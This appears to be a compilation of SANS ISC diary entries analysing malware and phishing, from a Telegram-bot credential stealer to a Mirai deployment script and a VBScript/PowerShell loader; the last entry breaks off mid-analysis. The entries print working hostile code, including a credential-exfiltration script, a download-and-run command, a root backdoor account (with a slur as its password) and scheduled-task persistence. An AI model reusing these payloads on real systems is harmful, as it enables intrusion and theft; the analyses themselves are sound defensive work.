Phishing kits are not new, they are plenty in the wild, and my honeypot collects many samples daily. Usually, a phishing kit will collect credentials and send them to a compromised server (WordPress is generally an excellent target to host this kind of malicious code). Later, I found many kits that (ab)use online services to receive data submitted via HTTP forms[1].

Today, I spotted a phishing campaign that stores collected credentials via a Telegram bot! Telegram bots are common in malicious Python scripts but less common in Phishing campaigns! The fake login page is pretty simple:

Everything happens through a piece of JavaScript code:

<script>
    document.getElementById("submitBtn").addEventListener("click", function(e) {
    e.preventDefault();
    var pswd = document.getElementById('password').value;
    if (pswd == null || pswd == ""){
        document.getElementById('msg').innerHTML = `<p style="font-size:15px;background-color:white; color:red">Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a></p>`;
        setTimeout(() => {document.getElementById('msg').innerHTML = '';}, 3000);}
    else if(pswd.length < 5){
        document.getElementById('msg').innerHTML = '<p style="font-size:15px;background-color:white; color:red">Your account password is too short.</p>';
        setTimeout(() => {document.getElementById('msg').innerHTML = ''; document.getElementById("submitBtn").reset();}, 3000);
    } else {
        var IP = document.getElementById('gfg').textContent;
        var message = `====== Office Excel ======\r\nEmail: ${email}\r\nPassword: ${pswd}\r\nIP: https://ip-api.com/${IP}\r\nUser-Agent: ${navigator.userAgent}\r\n===================`;
        var settings = {
            "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + token + "/sendMessage",
            "method": "POST", "headers": {"Content-Type": "application/json", "cache-control": "no-cache"},
            "data": JSON.stringify({"chat_id": chat_id, "text": message})}
             $.ajax(settings).done((response) => {
             document.getElementById("password").value ="";
             document.getElementById('msg').innerHTML = `<p style="font-size:15px;background-color:white; color:red">Your account or password is incorrect. if you don't remember your password, <a href="#">reset it now.</a></p>`;
             setTimeout(() => {document.getElementById('msg').innerHTML = '';}, 3000);
             });
    } 
    }); 
</script>

If the victim provides a password, interesting data are posted to a Telegram bot (credentials, IP, User-Agent) via a simple HTTP request built in JavaScript. However, the script has a big issue. A token is required to "talk" to the Telegram bot (see in red above). But, the token was not defined in the script, making it unusable! Yes, attackers make mistakes too!

[Note] This technique is not new, and was already covered in another diariy by Johannes[2] but the code is different here and the big mistake is funny!

[1] https://isc.sans.edu/diary/InfoStealer+Using+webhooksite+to+Exfiltrate+Data/28088
[2] https://isc.sans.edu/diary/Simple+HTML+Phishing+via+Telegram+Bot/29528

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

When you’re hunting, sometimes you feel lucky because you spotted something that looks brand new, but sometimes it’s not new or… the code has been changed to bypass existing detections. Here is a perfect example. A few months ago, Juniper discovered[1] a backdoor targeting VMWare ESXi servers, more precisely, the OpenSLP service (%%cve:2019-5544%% and %%cve:2020-3992%%).

If the backdoor isn’t new, I found new versions of it that implement more obfuscation techniques by reducing changes to be caught by antivirus tools and filters. The scripts, found on VT, have the following filename format: “esxi_ransomware_xxxxxxxx.py”. It seems that the attacker tested different obfuscation techniques. Sometimes, just having a look at the source code with a graphical overview is interesting:

Many text editors propose this kind of view. In the picture above, you can see patterns with only interesting lines at the end.

The backdoor has been obfuscated with many functions that look complicated, but most of them do… nothing! Example:

self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if opaque_fct_6_guXM09JTqW(1170448432, 34836967901, 30592200701, 23499594842, 7931033327):
    if opaque_fct_7_2givpU14Oj(12913767465, 29715926998, 28391806664, 34224856236, 27002350942, 38119355106, 17984667519, 33397958160, 34307567544, 3134198737, 6433478414, 1333569498, 30190306077, 31065906546):
        opaque_fct_3_HlBjJpTAMd(4559404501, 19631615206, 15232647523, 38155060881, 25231599065, 27560986774, 28564255047, 23742277226, 37444581463, 34726589553)
    elif opaque_fct_3_Jvb1H08Kzj(1744861910, 8785099158, 15933986777):opaque_fct_6_78lRkhN51d(13973672458, 29300903469, 6016412088, 32808894927, 2647492267, 10754001214, 28891585111, 32994113503, 19424804608)
    else:
        form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD': 'POST'})
    else:
        opaque_fct_7_ueGht7ZaDw(34708030056, 3642393576, 19762095891, 22250089401, 11960747056)

The first if() condition will always be TRUE:

def opaque_fct_6_guXM09JTqW(opaque_fct_6_guXM09JTqW_0, opaque_fct_6_guXM09JTqW_1, opaque_fct_6_guXM09JTqW_2, opaque_fct_6_guXM09JTqW_3, opaque_fct_6_guXM09JTqW_4):
    if (opaque_fct_6_guXM09JTqW_1 > opaque_fct_6_guXM09JTqW_0):
        return True
    if (opaque_fct_6_guXM09JTqW_4 <= opaque_fct_6_guXM09JTqW_1):
        return True
    if (opaque_fct_6_guXM09JTqW_1 > opaque_fct_6_guXM09JTqW_0):
        return True
    if (opaque_fct_6_guXM09JTqW_1 < opaque_fct_6_guXM09JTqW_0):
        return False
    if (opaque_fct_6_guXM09JTqW_3 >= opaque_fct_6_guXM09JTqW_1):
        return False
    if (opaque_fct_6_guXM09JTqW_1 < opaque_fct_6_guXM09JTqW_4):
        return False
    if (opaque_fct_6_guXM09JTqW_0 >= opaque_fct_6_guXM09JTqW_1):
        return False
    if (opaque_fct_6_guXM09JTqW_1 < opaque_fct_6_guXM09JTqW_4):
        return False
    if (opaque_fct_6_guXM09JTqW_1 < opaque_fct_6_guXM09JTqW_0):
        return False
    if (opaque_fct_6_guXM09JTqW_1 > opaque_fct_6_guXM09JTqW_0):
        return True
    if (opaque_fct_6_guXM09JTqW_0 <= opaque_fct_6_guXM09JTqW_1):
        return True
    if (opaque_fct_6_guXM09JTqW_0 >= opaque_fct_6_guXM09JTqW_1):
        return False

Indeed, if you check the parameters, '34836967901' will always be bigger than '1170448432'. Other calls are useless (like the first call to opaque_fct_3_HlBjJpTAMd()).

If you remove all the junk code, the backdoor has precisely the same behavior as the Juniper blog post explained.

[1] https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Most people will never execute a suspicious program or “executable”. Also, most of them cannot be delivered directly via email. Most antispam and antivirus solutions block them. But, then, how could people be so easily infected?

I’ll explain with the help of a file I found in a phishing campaign. The filename is “Swift23544679066.xlsx" (SHA256:421d30c99381f9fe4295c8c33d7e7278b323821c793bbe2f45d6003536871347) and is still unknown on VirusTotal. Here is a screenshot of the file opened in Excel:

Many Excel sheets contain VBA or legacy Excel 4 macros but here.. nothing! Anyway, let’s have a look at potential OLE content:

remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx
A: xl/embeddings/8sJz9b3F.uBx2
A1:    919012 '\x01OLE10NaTIvE'
A2:         0 'VDYic03w91Qt'

This reveals that an OLE document is embedded in the Excel sheet! Let’s unzip the document and search for interesting strings:

remnux@remnux:/MalwareZoo/20230314/zip$ find . -type f -exec grep 0LE {} \; -ls
Binary file ./xl/embeddings/8sJz9b3F.uBx2 matches
     1793    907 -rw-rw-r--   1 501      dialout    928768 Mar 13 20:57 ./xl/embeddings/8sJz9b3F.uBx2

This stream is referenced in worksheets/_rels/sheet1.xml.rels:

<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/8sJz9b3F.uBx2"/></Relationships>

Let’s follow the ID ‘rId3’. It’s referenced in worksheets/sheet1.xml:

<oleObject progId="9PrBwSjsFc8A5FCXYG4ILw5IQi20z" shapeId="1506" r:id="rId3" autoLoad="true"/></oleObjects>

The OLE object will be automatically used when the victim opens the document!

Let’s focus on this OLE stream now:

remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx -s A1 -a|head -20
00000000: 38 2B 7B 05 03 EE 69 DF  B3 B1 01 08 AC BE B8 C3  8+{...i.........
00000010: 42 BA FF F7 D0 8B 30 8B  0E BB B6 8B 9B 83 81 C3  B.....0.........
00000020: FA DB AA 7C 8B 3B 51 FF  D7 05 6F 4E 44 17 05 93  ...|.;Q...oND...
00000030: B2 BB E8 FF E0 64 37 33  D2 A3 80 04 42 00 C7 17  .....d73....B...
00000040: A9 EA 7C 40 45 85 4B 40  BD F2 58 8A 12 33 9A FB  ..|@E.K@..X..3..
00000050: 96 EE 49 37 5E 3A 8F 2C  46 46 9D 71 54 64 B7 6F  ..I7^:.,FF.qTd.o
00000060: 16 DA DB 73 8E 71 CF 62  8B C6 F9 5E 9D 39 DC B3  ...s.q.b...^.9..
00000070: 88 79 BB FC 41 2F 35 08  88 98 1E 4B 13 30 C3 A5  .y..A/5....K.0..
00000080: D2 B6 B5 55 D8 A5 AB FB  D8 E6 C6 E0 56 6D AD FA  ...U........Vm..
00000090: 85 FB D3 60 BC 1C 6D A9  BF 41 40 49 1B 06 F2 23  ...`..m..A@I...#
000000A0: DD 6C 88 26 6C A8 18 55  3D 5F 01 02 B1 4E 97 10  .l.&l..U=_...N..
000000B0: DF C8 2B 22 0F 14 34 ED  9B 7A A8 9D 96 AD D5 05  ..+"..4..z......
000000C0: DD 34 16 9D FD 17 D0 E2  FA 94 24 24 05 EC 2D 6B  .4........$$..-k
000000D0: 8E 07 A8 F2 D7 3A 08 6B  6B 51 B5 E0 0A 04 FA 9C  .....:.kkQ......
000000E0: 9C A0 62 E8 19 20 99 D8  F4 3F 7F A5 0E 6C 7E B7  ..b.. ...?...l~.
000000F0: 32 B3 EE F7 1C CC EE E9  A6 A6 16 28 E5 74 F6 EE  2..........(.t..
00000100: 08 98 B8 27 B6 07 E9 9B  01 00 00 F2 98 B8 8A 09  ...'............
00000110: 04 54 13 DA 0A FF 45 1A  38 68 5C 7F 4F DC EB 00  .T....E.8h\.O...
00000120: 85 93 1C 1F C2 E1 E7 1C  E4 84 5E 3C FC DD E3 0E  ..........^<....
00000130: 8D 30 6D 9A D5 E3 C7 B8  FD C7 D1 3B 69 48 BE 3E  .0m........;iH.>

We probably have here a shellcode! How to detect this? Remember that a shellcode is like a “naked” program, it is missing a lot of useful information present in a regular executable or PE file. To be executed successfully, it must know two critical pieces of information:

1. Where is it located in memory?
2. How to resolve API calls? (To call them and perform malicious activities)

To solve the first problem, many shellcodes perform a technique called “GetEIP”. EIP is the register that contains the address of the next instruction to be executed by the CPU. There is a simple way to detect how “GetEIP” is implemented. Let's extract the stream containing the shellcode and use Didier's tool xorsearch[1]:

remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx -s A1 -d >shellcode.bin
remnux@remnux:/MalwareZoo/20230314$ xorsearch -W -d 3 shellcode.bin
Found XOR 00 position 00000106: GetEIP method 3 E99B010000
Score: 10

How to interpret this command? xorsearch found a “GetEIP” method at offset 106 in the payload we extracted from the OLE stream. We are now ready to check our shell code and emulate it.

remnux@remnux:/MalwareZoo/20230314$ scdbgc /f shellcode.bin /foff 106
Loaded e05e4 bytes from file shellcode.bin
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000
Execution starts at file offset 106
401106 E99B010000                      jmp 0x4012a6  vv
40110b F298                            repne cbw
40110d B88A090454                      mov eax,0x5404098a
401112 13DA                            adc ebx,edx
401114 0AFF                            or bh,bh

4014d4 GetProcAddress(ExpandEnvironmentStringsW)
40150c ExpandEnvironmentStringsW(%APPDATA%\DJB.exe, dst=12fb64, sz=104)
401520 GetProcAddress(CreateFileW)
40153c CreateFileW(C:\users\remnux\Application Data\DJB.exe) = 4
401556 LoadLibraryW(WinHttp)
40156c GetProcAddress(WinHttpOpen)
401578 WinHttpOpen(, 0, , , 0) = 29
401590 GetProcAddress(WinHttpConnect)
4015bb WinHttpConnect(29, 109[.]206[.]240[.]64 (40159a) , 50, 0) = 4823
4015d7 GetProcAddress(WinHttpOpenRequest)
401607 WinHttpOpenRequest(4823, GET, /KJH.exe, , , , 0) = 18be
401623 GetProcAddress(WinHttpSendRequest)
401635 WinHttpSendRequest(18be, )
401654 GetProcAddress(WinHttpReceiveResponse)
40165c WinHttpReceiveResponse()
401670 GetProcAddress(WriteFile)
401694 GetProcAddress(WinHttpQueryDataAvailable)
4016ae GetProcAddress(WinHttpReadData)
4016bb WinHttpQueryDataAvailable()
40170f GetProcAddress(CloseHandle)
401714 CloseHandle(4)
40172c GetProcAddress(GetStartupInfoW)
401736 GetStartupInfoW(12fda4)
40174d GetProcAddress(CreateProcessW)
401775 CreateProcessW( , C:\users\remnux\Application Data\DJB.exe ) = 0x1269
401789 GetProcAddress(ExitProcess)
40178d ExitProcess(0)
Stepcount 42497

We can now "read" what the shell code will do. Remember that a shell code must be able to resolve API call (see the second information that must be known). To achieve this, the shellcode will use the GetProcAddress() API call provided by the kernel32 DLL. We see that the shell code will resolve many interesting API codes to perform the following actions:

1. Create a file DJB.exe in %appdata%
2. Download the 2nd stage from http://109[.]206[.]240[.]64/KJH.exe
3. Dump the downloaded payload to DJB.exe
4. Create a new process and launch DJB.exe

Game over! This will happen without any popups or something to click on. But wait, how can a shellcode be executed automatically by Excel just when the document is opened? Let’s have a look at the process tree when you detonate the file in a sandbox:

You see that the process created by the shellcode (DJB.exe) has EQNEDT32.EXE as the parent process. That’s the equation editor tool provided in Microsoft Office. It suffered from a very nasty vulnerability (%%cve:2017-11882%%) and is still exploited in the wild today! (of course, my sandbox remains vulnerable to this exploit)

[1] https://blog.didierstevens.com/2014/09/29/update-xorsearch-with-shellcode-detector/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

In the last couple of weeks, I’ve noticed a small spike in the number of phishing messages that carried links to fake HTML login pages hosted on the InterPlanetary File System (IPFS) – an interesting web-based decentralized/peer-to-peer data storage system. Unfortunately, pretty much any type of internet-connected data storage solution is used to host malicious content by threat actors these days, and the IPFS is no exception. In fact, it seems to have been used to host phishing pages since at least the beginning of 2022[1].

The recent wave of phishing messages is therefore not new in its use of the distributed file system, nor in the social engineering techniques it uses. What makes it somewhat interesting, besides the fact that it depends on IPFS, is that it also shows quite nicely the need for organizations to ensure that security-related headers are set by their web servers. This is because although, as you may see from the examples shown below, all the e-mails linking to pages hosted on IPFS were different…

…the HTML pages they linked to were very similar and all used the same clickjacking-related “login overlay over a legitimate website” trick.

This technique has been with us for a while now. It is based on the use of a HTML page, on which a fake login form is placed over an iframe, in which a legitimate website is loaded from a domain corresponding to the e-mail address of the recipient of the original phishing message. Since the e-mail address is (usually) passed to the phishing page in a parameter and the corresponding legitimate website is loaded dynamically, the result may look relatively believable, even though the fake login page was not tailor-made for a specific “target” individual or organization.

You may see an example of a reasonably good-looking result of this technique in the following image.

However, if the Content Security Policy and/or the X-Frame-Options HTTP headers are set, which is one of the standard defenses against clickjacking[2], the resulting login page is much less believable, as you may see in the following image…

Since clickjacking defenses have historically been used primarily to protect websites with sensitive functionalities and/or login forms, relevant security headers may not always be set for the “main website” of an organization.

However, as this phishing shows (and as do many others we’ve seen before), the lack of these headers on almost any website can potentially be a problem. Therefore, maybe the time has come to make CSP and other HTTP security headers the norm and not the exception. Although their use can sometimes be a little problematic, the corresponding issues can always be solved, and the simple use of few HTTP headers can make phishing attempts, such as the ones mentioned above, much less effective.

[1] https://www.trendmicro.com/en_us/research/22/l/web3-ipfs-only-used-for-phishing---so-far.html
[2] https://owasp.org/www-community/attacks/Clickjacking

-----------
Jan Kopriva
@jk0pr
Nettles Consulting

This month we got patches for 76 vulnerabilities. Of these, 9 are critical and 2 are already being exploited, according to Microsoft.

One of the exploited vulnerabilities is an elevation of privilege affecting Microsoft Outlook (CVE-2023-23397). According to the advisory, an attacker who successfully exploited this vulnerability could access a user's Net-NTLMv2 hash which could be used as a basis of an NTLM Relay attack against another service to authenticate as the user. The attacker could exploit this vulnerability by sending a specially crafted email that triggers automatically when it is retrieved and processed by the Outlook client. This could lead to exploitation BEFORE the email is viewed in the Preview Pane. The CVSS for this vulnerability is 9.8.

The second exploit vulnerability is a security feature bypass affecting Windows SmartScreen (CVE-2023-24880). According to the advisory, an attacker can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging. The CVSS for this vulnerability is 5.4. 

There is another critical vulnerability worth mentioning which is Remote Code Execution (RCE) affecting HTTP Protocol Stack (CVE-2023-23392). A prerequisite for a server to be vulnerable is that the binding has HTTP/3 enabled and the server uses buffered I/O. HTTP/3 support for services is a new feature of Windows Server 2022. This vulnerability requires no user interaction, no privileges, and the attack complexity is low. The CVSS for this vulnerability is 9.8.

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com/

March 2023 Security Updates

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

Any big news story tends to attract its set of scams. We have seen this happening for disasters, political events, and wars. So it isn't a big surprise that last week's failure of Silicon Valley Bank is starting to get some traction.

If you see any scams (phishing, malware...): Please let us know via our contact page or email (handlers - at - isc.sans.edu )

The failure of Silicon Valley Bank has some particularly enticing properties for scammers:

1. It involves a lot of money
2. Urgency: Many companies and individuals employed by companies have questions about how to pay urgent bills. Will my employer be able to make payroll? Is there anything I need to do right now?
3. Uncertainty: For many, it isn't clear how to communicate with SVB, what website to use, or what emails to expect (or where they will come from?)

All this is bound to result in some simple but also targeted scams.

You should expect some targeted scams if it is known that you or the company you work for banks with SVB. Most of the time, this information is more or less public. Expect not just email but also SMS or phone call scams.

Some of the legitimate offers may be indistinguishable from scams. People may offer loans or legal services to affected companies. As with natural disasters in the past, we also see law firms setting up dedicated pages to attract clients for an eventual lawsuit.

We do already see a little race to register SVB related domains:

Not all of these are outright scams, just try to make a more or less honest buck off the crisis. Here are some of the registrations related to the bank:

login-svb.com (currently "parked")
svbbailout.com
svbcertificates.com
svbclaim.com
svbcollapse.com
svbdeposits.com
svbhelp.com
svblawsuit.com

And many more...

Trying to go over some of the domains now to see what they contain and will update this story.

Update #1

As pointed out by Peter Bronez on Mastodon, this is a likely opportunity for scammers to conduct "Business Email Compromise" like scams. He sees emails from vendors informing their customers of new, non-SVB account information. Please do not be part of the problem. Do not just change banking information because of an email; reach out to vendors/customers via established communication media (phone...). Follow your procedure and do not allow false-urgency to affect what you are doing. VERIFY!

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

This week the mail server quarantined this file FautraPago392023.gz. I did find it a bit strange after I extracted (gunzip) the file, there was no .exe extension associated with this file. The source and destination addresses are both blank without an actual email address.

After submitting the file to a sandbox, the following indicators were extracted:

• The file dxkfngk.exe queries a list of running processes. 
• This domain www.dnuocc[.]com & dnuocc[.]com is configured to access port: 1452,1432.
• It uses Uses schtasks to add and modify task schedules with the following configuration:

C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "crssr" /tr '"C:\Users\user\AppData\Roaming\crssr.exe"'

Indicators Domains

www.dnuocc[.]com
dnuocc[.]com

Indicator IP

185.254.37.238

Indicators Files - SHA256

9d33cebf6b0dec41d47cad3163026d70b399113073615b8fbf25e5af4da48b4f FautraPago392023
89d7a9c65b8c702a2a1705363fede2fbdaa0d651f5fa24174a3628c5e3d982c6  FautraPago392023.gz
5C65E1361A5A58D5DD4C2EB8FBF599DBC817FAF9478F5560DE7D93E845F94B91 dxkfngk.exe
55184850A0812882FA185EEA292EE74E55E9F9BED01BA9DF7FED9257046FF7E1 dxkfngk.sfx.exe
5C65E1361A5A58D5DD4C2EB8FBF599DBC817FAF9478F5560DE7D93E845F94B91 crssr.exe

[1] https://otx.alienvault.com/indicator/ip/185.254.37.238
[2] https://www.virustotal.com/gui/file/9d33cebf6b0dec41d47cad3163026d70b399113073615b8fbf25e5af4da48b4f
[3] https://www.virustotal.com/gui/file/55184850A0812882FA185EEA292EE74E55E9F9BED01BA9DF7FED9257046FF7E1
[4] https://www.virustotal.com/gui/file/55184850A0812882FA185EEA292EE74E55E9F9BED01BA9DF7FED9257046FF7E1
[5] https://www.virustotal.com/gui/file/5c65e1361a5a58d5dd4c2eb8fbf599dbc817faf9478f5560de7d93e845f94b91
[6] https://www.shodan.io/host/185.254.37.238
[7] https://cybergordon.com/result.html?id=09b5de5f-f625-496e-83ae-57a8002c0961

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

The Mirai[1] botnet is active for years. It was the first botnet targeting devices running Linux like camera recorders. Our first diary about it was in 2016![2]. Still today, my honeypot is hit by hundreds of Mirai requests every day! I found a Python script that generates a Mirai payload (SHA256:f56391e9645df1058847e28af6918c64ddc344d9f328b3dde9015213d5efdc7e[3]) and deploys networking services to serve it via FTP, HTTP, and TFTP. Nothing very fancy but it will give you a good idea about how Linux hosts are abused to deliver malicious payloads.

First, the script grabs the public IP address of the host and defines some parameters:

ip = urllib.urlopen('http://api.ipify.org').read()
exec_bin = "yakuza"
exec_name = "wget.ssh"
bin_prefix = ""
bin_directory = "vi"
archs = ["x86.yakuza", 
"mips.yakuza", 
"mpsl.yakuza",
"arm4.yakuza", 
"arm5.yakuza",
"arm6.yakuza", 
"arm7.yakuza",
"ppc.yakuza",  
"m68k.yakuza",  
"sh4.yakuza"]  

Then, the script uses "yum" (so, it has been written to run in RedHat, CentOS, and Fedora distributions) to install the required packages to run network services to distribute the payloads:

def run(cmd):
    subprocess.call(cmd, shell=True)
print("[CC] INSTALLING WEB SERVER DEPENDENCIES")
run("yum install httpd -y &> /dev/null")
run("service httpd start &> /dev/null")
run("yum install xinetd tftp tftp-server -y &> /dev/null")
run("yum install vsftpd -y &> /dev/null")
run("service vsftpd start &> /dev/null")
run('''echo "service tftp
{
    socket_type             = dgram
    protocol                = udp
    wait                    = yes
    user                    = root
    server                  = /usr/sbin/in.tftpd
    server_args             = -s -c /var/lib/tftpboot
    disable                 = no
    per_source              = 11
    cps                     = 100 2
    flags                   = IPv4
}
" > /etc/xinetd.d/tftp''')    
run("service xinetd start &> /dev/null")
run('''echo "listen=YES
local_enable=NO
anonymous_enable=YES
write_enable=NO
anon_root=/var/ftp
anon_max_rate=2048000
xferlog_enable=YES
listen_address='''+ ip +'''
listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''')
run("service vsftpd restart &> /dev/null")
run("service xinetd restart &> /dev/null")

Malicious shell scripts are created in the "public" directories:

print("[CC] CREATING .SH BINS")
time.sleep(3)
run('echo "#!/bin/bash" > /var/lib/tftpboot/tyakuza.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/tyakuza.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tyakuza.sh')
run('echo "#!/bin/bash" > /var/lib/tftpboot/tyakuza2.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/tyakuza2.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tyakuza2.sh')
run('echo "#!/bin/bash" > /var/www/html/yakuza.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/tyakuza2.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tyakuza2.sh')
run('echo "#!/bin/bash" > /var/ftp/yakuza1.sh')
run('echo "ulimit -n 1024" >> /var/ftp/yakuza1.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/ftp/yakuza1.sh')

A backdoor is created via an alternate root account:

def exploitmake(cmd):
    subprocess.call(cmd, shell=True)
encoded = "Y2QgL3RtcDsgd2d ... tYzsgY2xlYXI7"
exploit = str(base64.b64decode(encoded))
exploitmake(exploit)

The Base64-encode data is (beautified):

cd /tmpwget
hxxps://pastebin[.]com/raw/Lq9P9Cg5 -O a > /dev/null 2>&1
chmod 777 a
sh a > /dev/null 2>&1
rm -rf a
history -c
clear

The content of the pastie is another script (also beautified):

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash bigbots
echo -e "fatnigger123\nfatnigger123" | passwd bigbots
wget -q -O /tmp/... hxxps://iplogger[.]com/2XPge5
rm -rf /var/log/lastlog
history -c

The host is now reachable via SSH with the rogue user 'bigbots'. 

I could not find the payload downloaded from iplogger[.]com (a well-known domain for hosting malicious content).

Scripts are created for all supported architectures:

for i in archs:
    run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+'; curl -O http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/www/html/yakuza.sh')
    run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' '+bin_prefix+i+' '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/ftp/yakuza1.sh')
    run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/lib/tftpboot/tyakuza.sh')
    run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r '+bin_prefix+i+' -g ' + ip + ';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/lib/tftpboot/tyakuza2.sh')    
run("service xinetd restart &> /dev/null")
run("service httpd restart &> /dev/null")
run('echo -e "ulimit -n 99999" >> ~/.bashrc')

Note that the binary executed by the script ("wget.ssh") was not present. 

This gives you a good idea about how new hosts can be configured to deliver Mirai payloads!

[1] https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
[2] https://isc.sans.edu/diary/A+few+Mirai+Updates+MIPS+PPC+version+a+bit+less+scanning/21631
[3] https://bazaar.abuse.ch/sample/f56391e9645df1058847e28af6918c64ddc344d9f328b3dde9015213d5efdc7e/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

In the FOR610[1] class, we learn how to perform malware analysis. The training focuses on Windows PE files but in the real world, malware samples use multiple technologies to perform malicious actions. I spotted a VBScript file (I don’t know where it’s coming from, probably a phishing campaign). The script has been flagged by only one(!) AV product on VT (SHA256: 81e4e91b8a841311b28b42951d53ec6ce471227480ca97c91c2aa1eeda6dad30[2]).

The VBScript implements a simple but effective obfuscation technique: The attacker implemented search/replace operations to inject extra code into the script. Example:

1: pr = "WyI2NTM0ODcxMTQx ... VRHZFhTMGslM0QiXQ=="
2: pls = db64("DQoNCiRqX1Zhcj0kbnVsbDsNCiRvaz0kdHJ … JCX0NCgkJfQ0KDQoJfSBjYXRjaHt9DQp9DQoNCg==")
3: pls = Replace(pls, db64("cmVwbGFjZV9wYXJhbQ=="), pr)
4: pls = Replace(eb64(pls), vbLf, "")

The variable "pls" contains the Base64-encoded PowerShell scripts, and, on line 3, the string “replace_param” ("cmVwbGFjZV9wYXJhbQ==") is replaced with a Base64-encoded data in the variable 'pr'. Here are the very first lines of the initial script:

1: $j_Var=$null;
2: $ok=$true
3: $rLD_v = "29";
4: $VRPar = "replace_param";
5: $ascEnC_str=[System.Text.Encoding]::ASCII;

The added data is a simple array:

["6534871141755962984",1678332192,"OTEwODQPBAMMDA4AAQwFDgQFAQILCAgMSAAEBQ8MCk0BDgMBAgMKBQAATGdXS0k%3D"]

This array is used here in the PowerShell script:

1: $j_Var=$ascEnC_str.GetString([System.Convert]::FromBase64String($VRPar)) | ConvertFrom-Json;
2: $di=$j_Var[2];
3: $is=$j_Var[1];
4: $u=$j_Var[0];

The deobfuscated code is now located in $pls. This code is injected into another script using the same technique:

1: cts = db64("JGQ9InJlcGxhY2VfcGx1YjY0IjsNCiR0YS ... CAgIH0gY2F0Y2h7fQ0KfQ0KDQpleGl0Ow==")
2: cts = Replace(cts, db64("cmVwbGFjZV9wbHViNjQ="), pls)

The PowerShell is launched via a nice trick:

1: Set so = CreateObject("WScript.Shell")
2: set ex = so.Exec(db64("Y21kLmV4ZSAvYyBwb3dlcnNoZWxsIC1XaW5kb3dTdHlsZSBIaWRkZW4gLQ=="))
3: ex.StdIn.Write cts & VbCrLf

“Y21kLmV4ZSAvYyBwb3dlcnNoZWxsIC1XaW5kb3dTdHlsZSBIaWRkZW4gLQ==“ decodes as “cmd.exe /c powershell -WindowStyle Hidden -“.

Did you see the trailing dash? PowerShell expects the code to execute from STDIN, see line 3.

This PowerShell script will implement its persistence via a scheduled task:

 1: $d="replace_plub64";
 2: $ta = New-ScheduledTaskAction -Execute 'cmd' -Argument "/c powershell -WindowStyle Hidden -E `"$d`"";
 3: $tt = New-ScheduledTaskTrigger -Once -At (Get-Date).AddSeconds(45) -RepetitionInterval (New-TimeSpan -Minutes 50);
 4: Register-ScheduledTask -TaskName "chrome center" -Action $ta -Trigger $tt -Description "Chrome center"; 
 5: $tsn = @("engine", "policy", "about", "sync", "customize", "accessibility", "data", "help", "find", "zoom", "profile", "nav", "glass", "control", "window", "panel", "tab", "view", "cast", "history", "flags", "bookmarks", "conf", "storage", "tools",  "settings", "support", "tele")
 6: for ($i=0 ; $i -lt $tsn.length ; ++$i) {
 7:    try {
 8:       $ts = "chrome {0}" -f $tsn[$i];
 9:       Unregister-ScheduledTask -TaskName $ts -Confirm:$false
10:    } catch{}
11: }
12: exit;

Note that the script removes scheduled tasks based on the same naming convention.

Let’s now have a look at the variable "$d" which contains the payload executed by the scheduled task!

The PowerShell contains some CSharp code that is compiled on the fly:

csc.exe /noconfig /fullpaths @"C:\Users\user01\AppData\Local\Temp\z2fptyrq.cmdline"

Here are the compilation details extracted from the file z2fptyrq.cmdline:

\xfeff/t:library /utf8output /R:"System.dll"
/R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" 
/R:"C:\Windows\assembly\GAC_32\System.Web\2.0.0.0__b03f5f7f11d50a3a\System.Web.dll" /R:"Microsoft.CSharp.dll" 
